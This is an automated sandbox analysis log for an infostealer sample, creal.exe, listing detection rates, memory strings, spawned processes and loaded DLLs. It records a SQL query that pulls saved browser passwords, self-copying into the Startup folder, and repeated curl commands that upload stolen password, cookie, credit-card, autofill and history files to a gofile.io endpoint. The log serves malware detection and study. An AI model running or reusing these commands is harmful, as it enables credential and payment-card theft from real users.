            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: creal.exe, 00000002.00000002.1568895664.00000185BC5F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT action_url, username_value, password_value FROM logins;
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: creal.exeBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: creal.exeVirustotal: Detection: 79%
            Source: creal.exeReversingLabs: Detection: 75%
            Source: C:\Users\user\Desktop\creal.exeFile read: C:\Users\user\Desktop\creal.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\creal.exe "C:\Users\user\Desktop\creal.exe"
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Users\user\Desktop\creal.exe "C:\Users\user\Desktop\creal.exe"
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Users\user\Desktop\creal.exe "C:\Users\user\Desktop\creal.exe"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Users\user\Desktop\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFileJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crcreditcards.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
            Source: C:\Users\user\Desktop\creal.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: libffi-8.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: libcrypto-3.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: libssl-3.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\creal.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: vcruntime140.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: libffi-8.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: libssl-3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: libcrypto-3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: sqlite3.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: dnsapi.dll
